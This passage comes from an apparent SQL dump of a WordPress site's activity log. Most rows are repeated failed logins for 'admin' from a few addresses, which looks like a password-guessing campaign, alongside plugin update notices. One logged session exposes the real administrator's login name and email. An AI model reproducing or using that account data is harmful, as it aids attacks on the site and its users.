Safari/537.36'),(225329,37711,'_message_key','user_unknown_login_failed'),(225330,37711,'_xmlrpc_request','true'),(225331,37711,'_server_remote_addr','20.168.0.x'),(225332,37712,'failed_username','admin'),(225333,37712,'server_http_user_agent','Mozilla/5.0'),(225334,37712,'_message_key','user_unknown_login_failed'),(225335,37712,'_server_remote_addr','45.136.118.x'),(225336,37713,'failed_username','admin'),(225337,37713,'server_http_user_agent','Mozilla/5.0'),(225338,37713,'_message_key','user_unknown_login_failed'),(225339,37713,'_server_remote_addr','45.136.118.x'),(225340,37714,'failed_username','admin'),(225341,37714,'server_http_user_agent','Mozilla/5.0'),(225342,37714,'_message_key','user_unknown_login_failed'),(225343,37714,'_server_remote_addr','45.136.118.x'),(225344,37715,'failed_username','admin'),(225345,37715,'server_http_user_agent','Mozilla/5.0'),(225346,37715,'_message_key','user_unknown_login_failed'),(225347,37715,'_server_remote_addr','45.136.118.x'),(225348,37716,'failed_username','admin'),(225349,37716,'server_http_user_agent','Mozilla/5.0'),(225350,37716,'_message_key','user_unknown_login_failed'),(225351,37716,'_server_remote_addr','45.136.118.x'),(225352,37717,'failed_username','admin'),(225353,37717,'server_http_user_agent','Mozilla/5.0'),(225354,37717,'_message_key','user_unknown_login_failed'),(225355,37717,'_server_remote_addr','45.136.118.x'),(225356,37718,'failed_username','admin'),(225357,37718,'server_http_user_agent','Mozilla/5.0'),(225358,37718,'_message_key','user_unknown_login_failed'),(225359,37718,'_server_remote_addr','45.136.118.x'),(225360,37719,'failed_username','admin'),(225361,37719,'server_http_user_agent','Mozilla/5.0'),(225362,37719,'_message_key','user_unknown_login_failed'),(225363,37719,'_server_remote_addr','45.136.118.x'),(225364,37720,'failed_username','admin'),(225365,37720,'server_http_user_agent','Mozilla/5.0'),(225366,37720,'_message_key','user_unknown_login_failed'),(225367,37720,'_server_remote_addr','20.168.0.x'),(225368,37721,'failed_username','admin'),(225369,37721,'server_http_user_agent','Mozilla/5.0'),(225370,37721,'_message_key','user_unknown_login_failed'),(225371,37721,'_server_remote_addr','45.136.118.x'),(225372,37722,'failed_username','admin'),(225373,37722,'server_http_user_agent','Mozilla/5.0'),(225374,37722,'_message_key','user_unknown_login_failed'),(225375,37722,'_server_remote_addr','45.136.118.x'),(225376,37723,'failed_username','admin'),(225377,37723,'server_http_user_agent','Mozilla/5.0'),(225378,37723,'_message_key','user_unknown_login_failed'),(225379,37723,'_server_remote_addr','20.168.0.x'),(225380,37724,'failed_username','admin'),(225381,37724,'server_http_user_agent','Mozilla/5.0'),(225382,37724,'_message_key','user_unknown_login_failed'),(225383,37724,'_server_remote_addr','45.136.118.x'),(225384,37725,'failed_username','admin'),(225385,37725,'server_http_user_agent','Mozilla/5.0'),(225386,37725,'_message_key','user_unknown_login_failed'),(225387,37725,'_server_remote_addr','20.168.0.x'),(225388,37726,'failed_username','admin'),(225389,37726,'server_http_user_agent','Mozilla/5.0'),(225390,37726,'_message_key','user_unknown_login_failed'),(225391,37726,'_server_remote_addr','45.136.118.x'),(225392,37727,'failed_username','admin'),(225393,37727,'server_http_user_agent','Mozilla/5.0'),(225394,37727,'_message_key','user_unknown_login_failed'),(225395,37727,'_server_remote_addr','20.168.0.x'),(225396,37728,'failed_username','admin'),(225397,37728,'server_http_user_agent','Mozilla/5.0'),(225398,37728,'_message_key','user_unknown_login_failed'),(225399,37728,'_server_remote_addr','45.136.118.x'),(225400,37729,'failed_username','admin'),(225401,37729,'server_http_user_agent','Mozilla/5.0'),(225402,37729,'_message_key','user_unknown_login_failed'),(225403,37729,'_server_remote_addr','20.168.0.x'),(225404,37730,'failed_username','admin'),(225405,37730,'server_http_user_agent','Mozilla/5.0'),(225406,37730,'_message_key','user_unknown_login_failed'),(225407,37730,'_server_remote_addr','45.136.118.x'),(225408,37731,'failed_username','admin'),(225409,37731,'server_http_user_agent','Mozilla/5.0'),(225410,37731,'_message_key','user_unknown_login_failed'),(225411,37731,'_server_remote_addr','20.168.0.x'),(225412,37732,'failed_username','admin'),(225413,37732,'server_http_user_agent','Mozilla/5.0'),(225414,37732,'_message_key','user_unknown_login_failed'),(225415,37732,'_server_remote_addr','45.136.118.x'),(225416,37733,'failed_username','admin'),(225417,37733,'server_http_user_agent','Mozilla/5.0'),(225418,37733,'_message_key','user_unknown_login_failed'),(225419,37733,'_server_remote_addr','20.168.0.x'),(225420,37734,'failed_username','admin'),(225421,37734,'server_http_user_agent','Mozilla/5.0'),(225422,37734,'_message_key','user_unknown_login_failed'),(225423,37734,'_server_remote_addr','45.136.118.x'),(225424,37735,'failed_username','admin'),(225425,37735,'server_http_user_agent','Mozilla/5.0'),(225426,37735,'_message_key','user_unknown_login_failed'),(225427,37735,'_server_remote_addr','45.136.118.x'),(225428,37736,'failed_username','admin'),(225429,37736,'server_http_user_agent','Mozilla/5.0'),(225430,37736,'_message_key','user_unknown_login_failed'),(225431,37736,'_server_remote_addr','20.168.0.x'),(225432,37737,'failed_username','admin'),(225433,37737,'server_http_user_agent','Mozilla/5.0'),(225434,37737,'_message_key','user_unknown_login_failed'),(225435,37737,'_server_remote_addr','45.136.118.x'),(225436,37738,'failed_username','admin'),(225437,37738,'server_http_user_agent','Mozilla/5.0'),(225438,37738,'_message_key','user_unknown_login_failed'),(225439,37738,'_server_remote_addr','20.168.0.x'),(225440,37739,'failed_username','admin'),(225441,37739,'server_http_user_agent','Mozilla/5.0'),(225442,37739,'_message_key','user_unknown_login_failed'),(225443,37739,'_server_remote_addr','45.136.118.x'),(225444,37740,'failed_username','admin'),(225445,37740,'server_http_user_agent','Mozilla/5.0'),(225446,37740,'_message_key','user_unknown_login_failed'),(225447,37740,'_server_remote_addr','20.168.0.x'),(225448,37741,'failed_username','admin'),(225449,37741,'server_http_user_agent','Mozilla/5.0'),(225450,37741,'_message_key','user_unknown_login_failed'),(225451,37741,'_server_remote_addr','45.136.118.x'),(225452,37742,'failed_username','admin'),(225453,37742,'server_http_user_agent','Mozilla/5.0'),(225454,37742,'_message_key','user_unknown_login_failed'),(225455,37742,'_server_remote_addr','20.168.0.x'),(225456,37743,'failed_username','admin'),(225457,37743,'server_http_user_agent','Mozilla/5.0'),(225458,37743,'_message_key','user_unknown_login_failed'),(225459,37743,'_server_remote_addr','45.136.118.x'),(225460,37744,'failed_username','admin'),(225461,37744,'server_http_user_agent','Mozilla/5.0'),(225462,37744,'_message_key','user_unknown_login_failed'),(225463,37744,'_server_remote_addr','20.168.0.x'),(225464,37745,'failed_username','admin'),(225465,37745,'server_http_user_agent','Mozilla/5.0'),(225466,37745,'_message_key','user_unknown_login_failed'),(225467,37745,'_server_remote_addr','45.136.118.x'),(225468,37746,'failed_username','admin'),(225469,37746,'server_http_user_agent','Mozilla/5.0'),(225470,37746,'_message_key','user_unknown_login_failed'),(225471,37746,'_server_remote_addr','20.168.0.x'),(225472,37747,'failed_username','admin'),(225473,37747,'server_http_user_agent','Mozilla/5.0'),(225474,37747,'_message_key','user_unknown_login_failed'),(225475,37747,'_server_remote_addr','45.136.118.x'),(225476,37748,'failed_username','admin'),(225477,37748,'server_http_user_agent','Mozilla/5.0'),(225478,37748,'_message_key','user_unknown_login_failed'),(225479,37748,'_server_remote_addr','20.168.0.x'),(225480,37749,'failed_username','admin'),(225481,37749,'server_http_user_agent','Mozilla/5.0'),(225482,37749,'_message_key','user_unknown_login_failed'),(225483,37749,'_server_remote_addr','45.136.118.x'),(225484,37750,'failed_username','admin'),(225485,37750,'server_http_user_agent','Mozilla/5.0'),(225486,37750,'_message_key','user_unknown_login_failed'),(225487,37750,'_server_remote_addr','45.136.118.x'),(225488,37751,'failed_username','admin'),(225489,37751,'server_http_user_agent','Mozilla/5.0'),(225490,37751,'_message_key','user_unknown_login_failed'),(225491,37751,'_server_remote_addr','20.168.0.x'),(225492,37752,'failed_username','admin'),(225493,37752,'server_http_user_agent','Mozilla/5.0'),(225494,37752,'_message_key','user_unknown_login_failed'),(225495,37752,'_server_remote_addr','45.136.118.x'),(225496,37753,'failed_username','admin'),(225497,37753,'server_http_user_agent','Mozilla/5.0'),(225498,37753,'_message_key','user_unknown_login_failed'),(225499,37753,'_server_remote_addr','20.168.0.x'),(225500,37754,'failed_username','admin'),(225501,37754,'server_http_user_agent','Mozilla/5.0'),(225502,37754,'_message_key','user_unknown_login_failed'),(225503,37754,'_server_remote_addr','45.136.118.x'),(225504,37755,'failed_username','admin'),(225505,37755,'server_http_user_agent','Mozilla/5.0'),(225506,37755,'_message_key','user_unknown_login_failed'),(225507,37755,'_server_remote_addr','20.168.0.x'),(225508,37756,'failed_username','admin'),(225509,37756,'server_http_user_agent','Mozilla/5.0'),(225510,37756,'_message_key','user_unknown_login_failed'),(225511,37756,'_server_remote_addr','45.136.118.x'),(225512,37757,'failed_username','admin'),(225513,37757,'server_http_user_agent','Mozilla/5.0'),(225514,37757,'_message_key','user_unknown_login_failed'),(225515,37757,'_server_remote_addr','45.136.118.x'),(225516,37758,'failed_username','admin'),(225517,37758,'server_http_user_agent','Mozilla/5.0'),(225518,37758,'_message_key','user_unknown_login_failed'),(225519,37758,'_server_remote_addr','45.136.118.x'),(225520,37759,'plugin_name','Autoptimize'),(225521,37759,'plugin_current_version','3.1.8.1'),(225522,37759,'plugin_new_version','3.1.9'),(225523,37759,'_message_key','plugin_update_available'),(225524,37759,'_server_remote_addr','173.231.231.x'),(225525,37760,'failed_username','admin'),(225526,37760,'server_http_user_agent','Mozilla/5.0'),(225527,37760,'_message_key','user_unknown_login_failed'),(225528,37760,'_server_remote_addr','45.136.118.x'),(225529,37761,'failed_username','admin'),(225530,37761,'server_http_user_agent','Mozilla/5.0'),(225531,37761,'_message_key','user_unknown_login_failed'),(225532,37761,'_server_remote_addr','45.136.118.x'),(225533,37762,'failed_username','admin'),(225534,37762,'server_http_user_agent','Mozilla/5.0'),(225535,37762,'_message_key','user_unknown_login_failed'),(225536,37762,'_server_remote_addr','45.136.118.x'),(225537,37763,'failed_username','admin'),(225538,37763,'server_http_user_agent','Mozilla/5.0'),(225539,37763,'_message_key','user_unknown_login_failed'),(225540,37763,'_server_remote_addr','45.136.118.x'),(225541,37764,'failed_username','admin'),(225542,37764,'server_http_user_agent','Mozilla/5.0'),(225543,37764,'_message_key','user_unknown_login_failed'),(225544,37764,'_server_remote_addr','45.136.118.x'),(225545,37765,'failed_username','admin'),(225546,37765,'server_http_user_agent','Mozilla/5.0'),(225547,37765,'_message_key','user_unknown_login_failed'),(225548,37765,'_server_remote_addr','45.136.118.x'),(225549,37766,'failed_username','admin'),(225550,37766,'server_http_user_agent','Mozilla/5.0'),(225551,37766,'_message_key','user_unknown_login_failed'),(225552,37766,'_server_remote_addr','45.136.118.x'),(225553,37767,'failed_username','admin'),(225554,37767,'server_http_user_agent','Mozilla/5.0'),(225555,37767,'_message_key','user_unknown_login_failed'),(225556,37767,'_server_remote_addr','45.136.118.x'),(225557,37768,'failed_username','admin'),(225558,37768,'server_http_user_agent','Mozilla/5.0'),(225559,37768,'_message_key','user_unknown_login_failed'),(225560,37768,'_server_remote_addr','45.136.118.x'),(225561,37769,'failed_username','administrator'),(225562,37769,'server_http_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53'),(225563,37769,'_message_key','user_unknown_login_failed'),(225564,37769,'_server_remote_addr','45.61.185.x'),(225565,37770,'failed_username','admin'),(225566,37770,'server_http_user_agent','Mozilla/5.0'),(225567,37770,'_message_key','user_unknown_login_failed'),(225568,37770,'_server_remote_addr','45.136.118.x'),(225569,37771,'failed_username','admin'),(225570,37771,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36'),(225571,37771,'_message_key','user_unknown_login_failed'),(225572,37771,'_server_remote_addr','104.244.74.x'),(225573,37772,'failed_username','admin'),(225574,37772,'server_http_user_agent','Mozilla/5.0'),(225575,37772,'_message_key','user_unknown_login_failed'),(225576,37772,'_server_remote_addr','45.136.118.x'),(225577,37773,'failed_username','admin'),(225578,37773,'server_http_user_agent','Mozilla/5.0'),(225579,37773,'_message_key','user_unknown_login_failed'),(225580,37773,'_server_remote_addr','45.136.118.x'),(225581,37774,'failed_username','admin'),(225582,37774,'server_http_user_agent','Mozilla/5.0'),(225583,37774,'_message_key','user_unknown_login_failed'),(225584,37774,'_server_remote_addr','45.136.118.x'),(225585,37775,'failed_username','admin'),(225586,37775,'server_http_user_agent','Mozilla/5.0'),(225587,37775,'_message_key','user_unknown_login_failed'),(225588,37775,'_server_remote_addr','45.136.118.x'),(225589,37776,'failed_username','admin'),(225590,37776,'server_http_user_agent','Mozilla/5.0'),(225591,37776,'_message_key','user_unknown_login_failed'),(225592,37776,'_server_remote_addr','45.136.118.x'),(225593,37777,'failed_username','admin'),(225594,37777,'server_http_user_agent','Mozilla/5.0'),(225595,37777,'_message_key','user_unknown_login_failed'),(225596,37777,'_server_remote_addr','45.136.118.x'),(225597,37778,'failed_username','admin'),(225598,37778,'server_http_user_agent','Mozilla/5.0'),(225599,37778,'_message_key','user_unknown_login_failed'),(225600,37778,'_server_remote_addr','20.169.8.x'),(225601,37779,'failed_username','admin'),(225602,37779,'server_http_user_agent','Mozilla/5.0'),(225603,37779,'_message_key','user_unknown_login_failed'),(225604,37779,'_server_remote_addr','45.136.118.x'),(225605,37780,'failed_username','admin'),(225606,37780,'server_http_user_agent','Mozilla/5.0'),(225607,37780,'_message_key','user_unknown_login_failed'),(225608,37780,'_server_remote_addr','45.136.118.x'),(225609,37781,'failed_username','admin'),(225610,37781,'server_http_user_agent','Mozilla/5.0'),(225611,37781,'_message_key','user_unknown_login_failed'),(225612,37781,'_server_remote_addr','45.136.118.x'),(225613,37782,'failed_username','admin'),(225614,37782,'server_http_user_agent','Mozilla/5.0'),(225615,37782,'_message_key','user_unknown_login_failed'),(225616,37782,'_server_remote_addr','45.136.118.x'),(225617,37783,'failed_username','admin'),(225618,37783,'server_http_user_agent','Mozilla/5.0'),(225619,37783,'_message_key','user_unknown_login_failed'),(225620,37783,'_server_remote_addr','20.169.8.x'),(225621,37784,'failed_username','admin'),(225622,37784,'server_http_user_agent','Mozilla/5.0'),(225623,37784,'_message_key','user_unknown_login_failed'),(225624,37784,'_server_remote_addr','45.136.118.x'),(225625,37785,'failed_username','admin'),(225626,37785,'server_http_user_agent','Mozilla/5.0'),(225627,37785,'_message_key','user_unknown_login_failed'),(225628,37785,'_server_remote_addr','45.136.118.x'),(225629,37786,'failed_username','admin'),(225630,37786,'server_http_user_agent','Mozilla/5.0'),(225631,37786,'_message_key','user_unknown_login_failed'),(225632,37786,'_server_remote_addr','45.136.118.x'),(225633,37787,'failed_username','admin'),(225634,37787,'server_http_user_agent','Mozilla/5.0'),(225635,37787,'_message_key','user_unknown_login_failed'),(225636,37787,'_server_remote_addr','20.169.8.x'),(225637,37788,'failed_username','admin'),(225638,37788,'server_http_user_agent','Mozilla/5.0'),(225639,37788,'_message_key','user_unknown_login_failed'),(225640,37788,'_server_remote_addr','45.136.118.x'),(225641,37789,'post_id','269206'),(225642,37789,'post_type','nf_sub'),(225643,37789,'post_title',''),(225644,37789,'_message_key','post_updated'),(225645,37789,'_server_remote_addr','38.42.17.x'),(225646,37789,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/?utm_source=BenchmarkEmail&utm_campaign=ETC_October_2023_Reminder_Week_2&utm_medium=email'),(225647,37790,'failed_username','admin'),(225648,37790,'server_http_user_agent','Mozilla/5.0'),(225649,37790,'_message_key','user_unknown_login_failed'),(225650,37790,'_server_remote_addr','45.136.118.x'),(225651,37791,'failed_username','admin'),(225652,37791,'server_http_user_agent','Mozilla/5.0'),(225653,37791,'_message_key','user_unknown_login_failed'),(225654,37791,'_server_remote_addr','45.136.118.x'),(225655,37792,'failed_username','admin'),(225656,37792,'server_http_user_agent','Mozilla/5.0'),(225657,37792,'_message_key','user_unknown_login_failed'),(225658,37792,'_server_remote_addr','20.169.8.x'),(225659,37793,'failed_username','admin'),(225660,37793,'server_http_user_agent','Mozilla/5.0'),(225661,37793,'_message_key','user_unknown_login_failed'),(225662,37793,'_server_remote_addr','45.136.118.x'),(225663,37794,'plugin_name','Modern Events Calendar'),(225664,37794,'plugin_current_version','7.1.0'),(225665,37794,'plugin_new_version','7.2.0'),(225666,37794,'_message_key','plugin_update_available'),(225667,37794,'_server_remote_addr','173.231.231.x'),(225668,37795,'failed_username','admin'),(225669,37795,'server_http_user_agent','Mozilla/5.0'),(225670,37795,'_message_key','user_unknown_login_failed'),(225671,37795,'_server_remote_addr','45.136.118.x'),(225672,37796,'failed_username','admin'),(225673,37796,'server_http_user_agent','Mozilla/5.0'),(225674,37796,'_message_key','user_unknown_login_failed'),(225675,37796,'_server_remote_addr','45.136.118.x'),(225676,37797,'failed_username','admin'),(225677,37797,'server_http_user_agent','Mozilla/5.0'),(225678,37797,'_message_key','user_unknown_login_failed'),(225679,37797,'_server_remote_addr','45.136.118.x'),(225680,37798,'failed_username','admin'),(225681,37798,'server_http_user_agent','Mozilla/5.0'),(225682,37798,'_message_key','user_unknown_login_failed'),(225683,37798,'_server_remote_addr','20.169.8.x'),(225684,37799,'user_id','2'),(225685,37799,'user_email','nada@zipnadanot.org'),(225686,37799,'user_login','S8zhaBda'),(225687,37799,'_user_id','2'),(225688,37799,'_user_login','S8zhaBda'),(225689,37799,'_user_email','nada@zipnadanot.org'),(225690,37799,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0'),(225691,37799,'_message_key','user_logged_in'),(225692,37799,'_server_remote_addr','76.130.120.x'),(225693,37799,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(225694,37800,'failed_username','admin'),(225695,37800,'server_http_user_agent','Mozilla/5.0'),(225696,37800,'_message_key','user_unknown_login_failed'),(225697,37800,'_server_remote_addr','45.136.118.x'),(225698,37801,'_user_id','2'),(225699,37801,'_user_login','S8zhaBda'),(225700,37801,'_user_email','nada@zipnadanot.org'),(225701,37801,'_message_key','user_logged_out'),(225702,37801,'_server_remote_addr','76.130.120.x'),(225703,37801,'_server_http_referer','https://eckankar-colorado.org/wp-admin/admin.php?page=nf-submissions&form_id=61'),(225704,37802,'failed_username','admin'),(225705,37802,'server_http_user_agent','Mozilla/5.0'),(225706,37802,'_message_key','user_unknown_login_failed'),(225707,37802,'_server_remote_addr','45.136.118.x'),(225708,37803,'failed_username','admin'),(225709,37803,'server_http_user_agent','Mozilla/5.0'),(225710,37803,'_message_key','user_unknown_login_failed'),(225711,37803,'_server_remote_addr','45.136.118.x'),(225712,37804,'failed_username','admin'),(225713,37804,'server_http_user_agent','Mozilla/5.0'),(225714,37804,'_message_key','user_unknown_login_failed'),(225715,37804,'_server_remote_addr','45.136.118.x'),(225716,37805,'failed_username','admin'),(225717,37805,'server_http_user_agent','Mozilla/5.0'),(225718,37805,'_message_key','user_unknown_login_failed'),(225719,37805,'_server_remote_addr','20.169.8.x'),(225720,37806,'failed_username','admin'),(225721,37806,'server_http_user_agent','Mozilla/5.0'),(225722,37806,'_message_key','user_unknown_login_failed'),(225723,37806,'_server_remote_addr','45.136.118.x'),(225724,37807,'failed_username','admin'),(225725,37807,'server_http_user_agent','Mozilla/5.0'),(225726,37807,'_message_key','user_unknown_login_failed'),(225727,37807,'_server_remote_addr','45.136.118.x'),(225728,37808,'failed_username','admin'),(225729,37808,'server_http_user_agent','Mozilla/5.0'),(225730,37808,'_message_key','user_unknown_login_failed'),(225731,37808,'_server_remote_addr','45.136.118.x'),(225732,37809,'failed_username','admin'),(225733,37809,'server_http_user_agent','Mozilla/5.0'),(225734,37809,'_message_key','user_unknown_login_failed'),(225735,37809,'_server_remote_addr','45.136.118.x'),(225736,37810,'failed_username','admin'),(225737,37810,'server_http_user_agent','Mozilla/5.0'),(225738,37810,'_message_key','user_unknown_login_failed'),(225739,37810,'_server_remote_addr','20.169.8.x'),(225740,37811,'failed_username','admin'),(225741,37811,'server_http_user_agent','Mozilla/5.0'),(225742,37811,'_message_key','user_unknown_login_failed'),(225743,37811,'_server_remote_addr','45.136.118.x'),(225744,37812,'failed_username','admin'),(225745,37812,'server_http_user_agent','Mozilla/5.0'),(225746,37812,'_message_key','user_unknown_login_failed'),(225747,37812,'_server_remote_addr','45.136.118.x'),(225748,37813,'failed_username','admin'),(225749,37813,'server_http_user_agent','Mozilla/5.0'),(225750,37813,'_message_key','user_unknown_login_failed'),(225751,37813,'_server_remote_addr','45.136.118.x'),(225752,37814,'failed_username','admin'),(225753,37814,'server_http_user_agent','Mozilla/5.0'),(225754,37814,'_message_key','user_unknown_login_failed'),(225755,37814,'_server_remote_addr','20.169.8.x'),(225756,37815,'failed_username','admin'),(225757,37815,'server_http_user_agent','Mozilla/5.0'),(225758,37815,'_message_key','user_unknown_login_failed'),(225759,37815,'_server_remote_addr','45.136.118.x'),(225760,37816,'failed_username','admin'),(225761,37816,'server_http_user_agent','Mozilla/5.0'),(225762,37816,'_message_key','user_unknown_login_failed'),(225763,37816,'_server_remote_addr','45.136.118.x'),(225764,37817,'failed_username','admin'),(225765,37817,'server_http_user_agent','Mozilla/5.0'),(225766,37817,'_message_key','user_unknown_login_failed'),(225767,37817,'_server_remote_addr','45.136.118.x'),(225768,37818,'failed_username','admin'),(225769,37818,'server_http_user_agent','Mozilla/5.0'),(225770,37818,'_message_key','user_unknown_login_failed'),(225771,37818,'_server_remote_addr','45.136.118.x'),(225772,37819,'failed_username','admin'),(225773,37819,'server_http_user_agent','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36'),(225774,37819,'_message_key','user_unknown_login_failed'),(225775,37819,'_server_remote_addr','209.141.34.x'),(225776,37820,'failed_username','admin'),(225777,37820,'server_http_user_agent','Mozilla/5.0'),(225778,37820,'_message_key','user_unknown_login_failed'),(225779,37820,'_server_remote_addr','20.169.8.x'),(225780,37821,'failed_username','admin'),(225781,37821,'server_http_user_agent','Mozilla/5.0'),(225782,37821,'_message_key','user_unknown_login_failed'),(225783,37821,'_server_remote_addr','45.136.118.x'),(225784,37822,'failed_username','admin'),(225785,37822,'server_http_user_agent','Mozilla/5.0'),(225786,37822,'_message_key','user_unknown_login_failed'),(225787,37822,'_server_remote_addr','45.136.118.x'),(225788,37823,'failed_username','administrator'),(225789,37823,'server_http_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(225790,37823,'_message_key','user_unknown_login_failed'),(225791,37823,'_server_remote_addr','205.185.115.x'),(225792,37824,'failed_username','admin'),(225793,37824,'server_http_user_agent','Mozilla/5.0'),(225794,37824,'_message_key','user_unknown_login_failed'),(225795,37824,'_server_remote_addr','45.136.118.x'),(225796,37825,'failed_username','admin'),(225797,37825,'server_http_user_agent','Mozilla/5.0'),(225798,37825,'_message_key','user_unknown_login_failed'),(225799,37825,'_server_remote_addr','45.136.118.x'),(225800,37826,'failed_username','admin'),(225801,37826,'server_http_user_agent','Mozilla/5.0'),(225802,37826,'_message_key','user_unknown_login_failed'),(225803,37826,'_server_remote_addr','20.169.8.x'),(225804,37827,'failed_username','admin'),(225805,37827,'server_http_user_agent','Mozilla/5.0'),(225806,37827,'_message_key','user_unknown_login_failed'),(225807,37827,'_server_remote_addr','45.136.118.x'),(225808,37828,'failed_username','admin'),(225809,37828,'server_http_user_agent','Mozilla/5.0'),(225810,37828,'_message_key','user_unknown_login_failed'),(225811,37828,'_server_remote_addr','45.136.118.x'),(225812,37829,'failed_username','admin'),(225813,37829,'server_http_user_agent','Mozilla/5.0'),(225814,37829,'_message_key','user_unknown_login_failed'),(225815,37829,'_server_remote_addr','45.136.118.x'),(225816,37830,'failed_username','admin'),(225817,37830,'server_http_user_agent','Mozilla/5.0'),(225818,37830,'_message_key','user_unknown_login_failed'),(225819,37830,'_server_remote_addr','45.136.118.x'),(225820,37831,'failed_username','admin'),(225821,37831,'server_http_user_agent','Mozilla/5.0'),(225822,37831,'_message_key','user_unknown_login_failed'),(225823,37831,'_server_remote_addr','20.169.8.x'),(225824,37832,'failed_username','admin'),(225825,37832,'server_http_user_agent','Mozilla/5.0'),(225826,37832,'_message_key','user_unknown_login_failed'),(225827,37832,'_server_remote_addr','45.136.118.x'),(225828,37833,'failed_username','admin'),(225829,37833,'server_http_user_agent','Mozilla/5.0'),(225830,37833,'_message_key','user_unknown_login_failed'),(225831,37833,'_server_remote_addr','45.136.118.x'),(225832,37834,'failed_username','admin'),(225833,37834,'server_http_user_agent','Mozilla/5.0'),(225834,37834,'_message_key','user_unknown_login_failed'),(225835,37834,'_server_remote_addr','45.136.118.x'),(225836,37835,'failed_username','admin'),(225837,37835,'server_http_user_agent','Mozilla/5.0'),(225838,37835,'_message_key','user_unknown_login_failed'),(225839,37835,'_server_remote_addr','45.136.118.x'),(225840,37836,'failed_username','admin'),(225841,37836,'server_http_user_agent','Mozilla/5.0'),(225842,37836,'_message_key','user_unknown_login_failed'),(225843,37836,'_server_remote_addr','20.169.8.x'),(225844,37837,'failed_username','admin'),(225845,37837,'server_http_user_agent','Mozilla/5.0'),(225846,37837,'_message_key','user_unknown_login_failed'),(225847,37837,'_server_remote_addr','45.136.118.x'),(225848,37838,'failed_username','admin'),(225849,37838,'server_http_user_agent','Mozilla/5.0'),(225850,37838,'_message_key','user_unknown_login_failed'),(225851,37838,'_server_remote_addr','45.136.118.x'),(225852,37839,'failed_username','admin'),(225853,37839,'server_http_user_agent','Mozilla/5.0'),(225854,37839,'_message_key','user_unknown_login_failed'),(225855,37839,'_server_remote_addr','45.136.118.x'),(225856,37840,'failed_username','admin'),(225857,37840,'server_http_user_agent','Mozilla/5.0'),(225858,37840,'_message_key','user_unknown_login_failed'),(225859,37840,'_server_remote_addr','45.136.118.x'),(225860,37841,'failed_username','admin'),(225861,37841,'server_http_user_agent','Mozilla/5.0'),(225862,37841,'_message_key','user_unknown_login_failed'),(225863,37841,'_server_remote_addr','20.169.8.x'),(225864,37842,'failed_username','admin'),(225865,37842,'server_http_user_agent','Mozilla/5.0'),(225866,37842,'_message_key','user_unknown_login_failed'),(225867,37842,'_server_remote_addr','45.136.118.x'),(225868,37843,'failed_username','admin'),(225869,37843,'server_http_user_agent','Mozilla/5.0'),(225870,37843,'_message_key','user_unknown_login_failed'),(225871,37843,'_server_remote_addr','45.136.118.x'),(225872,37844,'failed_username','admin'),(225873,37844,'server_http_user_agent','Mozilla/5.0'),(225874,37844,'_message_key','user_unknown_login_failed'),(225875,37844,'_server_remote_addr','45.136.118.x'),(225876,37845,'failed_username','admin'),(225877,37845,'server_http_user_agent','Mozilla/5.0'),(225878,37845,'_message_key','user_unknown_login_failed'),(225879,37845,'_server_remote_addr','45.136.118.x'),(225880,37846,'failed_username','admin'),(225881,37846,'server_http_user_agent','Mozilla/5.0'),(225882,37846,'_message_key','user_unknown_login_failed'),(225883,37846,'_server_remote_addr','20.169.8.x'),(225884,37847,'failed_username','admin'),(225885,37847,'server_http_user_agent','Mozilla/5.0'),(225886,37847,'_message_key','user_unknown_login_failed'),(225887,37847,'_server_remote_addr','45.136.118.x'),(225888,37848,'failed_username','admin'),(225889,37848,'server_http_user_agent','Mozilla/5.0'),(225890,37848,'_message_key','user_unknown_login_failed'),(225891,37848,'_server_remote_addr','45.136.118.x'),(225892,37849,'failed_username','admin'),(225893,37849,'server_http_user_agent','Mozilla/5.0'),(225894,37849,'_message_key','user_unknown_login_failed'),(225895,37849,'_server_remote_addr','45.136.118.x'),(225896,37850,'failed_username','admin'),(225897,37850,'server_http_user_agent','Mozilla/5.0'),(225898,37850,'_message_key','user_unknown_login_failed'),(225899,37850,'_server_remote_addr','45.136.118.x'),(225900,37851,'failed_username','admin'),(225901,37851,'server_http_user_agent','Mozilla/5.0'),(225902,37851,'_message_key','user_unknown_login_failed'),(225903,37851,'_server_remote_addr','20.169.8.x'),(225904,37852,'failed_username','admin'),(225905,37852,'server_http_user_agent','Mozilla/5.0'),(225906,37852,'_message_key','user_unknown_login_failed'),(225907,37852,'_server_remote_addr','45.136.118.x'),(225908,37853,'failed_username','admin'),(225909,37853,'server_http_user_agent','Mozilla/5.0'),(225910,37853,'_message_key','user_unknown_login_failed'),(225911,37853,'_server_remote_addr','45.136.118.x'),(225912,37854,'failed_username','admin'),(225913,37854,'server_http_user_agent','Mozilla/5.0'),(225914,37854,'_message_key','user_unknown_login_failed'),(225915,37854,'_server_remote_addr','45.136.118.x'),(225916,37855,'failed_username','admin'),(225917,37855,'server_http_user_agent','Mozilla/5.0'),(225918,37855,'_message_key','user_unknown_login_failed'),(225919,37855,'_server_remote_addr','45.136.118.x'),(225920,37856,'failed_username','admin'),(225921,37856,'server_http_user_agent','Mozilla/5.0'),(225922,37856,'_message_key','user_unknown_login_failed'),(225923,37856,'_server_remote_addr','45.136.118.x'),(225924,37857,'failed_username','admin'),(225925,37857,'server_http_user_agent','Mozilla/5.0'),(225926,37857,'_message_key','user_unknown_login_failed'),(225927,37857,'_server_remote_addr','20.169.8.x'),(225928,37858,'failed_username','admin'),(225929,37858,'server_http_user_agent','Mozilla/5.0'),(225930,37858,'_message_key','user_unknown_login_failed'),(225931,37858,'_server_remote_addr','45.136.118.x'),(225932,37859,'failed_username','admin'),(225933,37859,'server_http_user_agent','Mozilla/5.0'),(225934,37859,'_message_key','user_unknown_logi